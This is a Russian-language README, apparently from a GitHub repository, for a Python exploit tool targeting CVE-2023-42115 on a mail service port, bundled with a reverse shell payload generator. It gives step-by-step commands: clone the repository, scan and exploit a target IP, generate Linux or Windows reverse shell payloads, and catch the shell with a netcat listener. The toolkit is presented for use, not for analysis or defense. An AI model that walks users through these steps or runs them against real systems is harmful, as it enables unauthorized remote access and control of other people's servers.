
Генератор эксплойтов и reverse shell payload на Python для CVE-2023-42115 с режимами сканирования и эксплуатации и созданием кроссплатформенных payload.
Этот репозиторий содержит два скрипта Python:
exploit.py: Скрипт для эксплуатации CVE-2023-42115.generate_payload.py: Скрипт для генерации полезных нагрузок reverse shell.Перед запуском скриптов убедитесь, что в вашей системе установлен Python 3.
Клонирование репозитория:
git clone https://github.com/isotaka134/cve-2023-42115.git
cd cve-2023-42115
Установка зависимостей:
Установите необходимые библиотеки Python с помощью pip. Выполните следующую команду для установки всех зависимостей, перечисленных в requirements.txt:
pip install -r requirements.txt
exploit.py
Этот скрипт эксплуатирует уязвимость CVE-2023-42115.
python exploit.py -t <target_ip> -p <target_port> [options]
Опции:
-t: IP-адрес цели.
-p: Порт целевого сервиса.
Пример:
python exploit.py -t 192.168.1.10 -p 25 --mode SCAN
python exploit.py -t 192.168.1.10 -p 25 --mode EXPLOIT -f /path/to/payload.sh
generate_payload.py
Этот скрипт генерирует полезную нагрузку reverse shell на основе ввода пользователя.
python generate_payload.py
Шаги:
Скрипт запросит следующую информацию:
A. Тип полезной нагрузки ( linux или windows)
B. Локальный IP: адрес для обратного подключения
C. Локальный порт: для обратного подключения ** Примечание: Если вы находитесь за маршрутизатором или используете NAT, убедитесь, что настроили корректную переадресацию портов на ваше устройство, запускающее Netcat.**
D. Имя выходного файла (например, payload.sh для Linux или payload.ps1 для Windows)
Пример:
python generate_payload.py
Payload Generator
Enter payload type (linux/windows): Linux
Enter local IP address: 127.0.0.1
Enter local port: 4444
Enter output file name (e.g., payload.sh or payload.ps1): Payload.sh
Payload saved to Payload.sh
Вам нужно настроить слушатель на вашей локальной машине для приема reverse shell. Вы можете использовать Netcat (nc) для этого.
nc -lvnp <YOUR_LOCAL_PORT>
nc -lvnp <YOUR_LOCAL_PORT>
Следуя этим шагам, вы сможете создать и использовать полезную нагрузку для эксплуатации CVE-2023-42115 и получить обратное подключение reverse shell.
Если у вас есть предложения по улучшению или вы хотите внести свой вклад, пожалуйста, откройте issue или отправьте pull request.
По вопросам или за поддержкой обращайтесь
[email protected]